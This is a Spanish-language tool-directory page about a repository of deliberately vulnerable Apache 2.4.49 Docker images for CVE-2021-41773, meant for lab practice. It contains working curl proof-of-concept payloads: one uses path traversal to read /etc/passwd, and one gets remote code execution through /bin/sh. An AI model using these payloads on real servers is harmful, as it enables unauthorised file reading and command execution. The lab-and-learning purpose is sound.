Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2021-41773 — Imágenes de Docker vulnerables para CVE-2021-41773 | Kitploit
Herramientas/GitHubGitHub/blueteamsteve/cve-2021-41773
Seguridad de ContenedoresAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónLabs y Práctica
GitHubblueteamsteve/cve-2021-41773

CVE-2021-41773

Imágenes de Docker vulnerables para CVE-2021-41773

Ver Repositorio
238hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Imágenes Docker vulnerables para CVE-2021-41773 Apache path traversal

Esta vulnerabilidad solo aplica a la versión 2.4.49 que tiene configuraciones específicas no predeterminadas. En ciertas situaciones, esto puede resultar en lectura de archivos o ejecución de código.

tweet https://twitter.com/ptswarm/status/1445376079548624899

Configuración vulnerable para lectura de archivos

Los contenedores se pueden extraer directamente de Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:no-cgid

y ejecutarlos usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid

Los registros de Apache se pueden ver usando lo siguiente, o simplemente excluir "-dit" del comando de ejecución anterior para transmitir stdio docker logs <container-id>

PoC para lectura de archivos

curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd

Configuración vulnerable para RCE

Los contenedores se pueden extraer directamente de Docker Hub usando

docker pull blueteamsteve/cve-2021-41773:with-cgid

y ejecutarlos usando

docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid

Los registros de Apache se pueden ver usando lo siguiente, o simplemente excluir "-dit" del comando de ejecución anterior para transmitir stdio docker logs <container-id>

PoC para RCE

curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'

Construir contenedores Docker personalizados

Modifique y construya sus propias versiones usando el dockerfile y los archivos de plantilla httpd.conf en los subdirectorios

  • Use ./no-cgi para la configuración vulnerable a lectura de archivos
  • Use ./with-cgi para la configuración vulnerable a ejecución de código
Descargar herramienta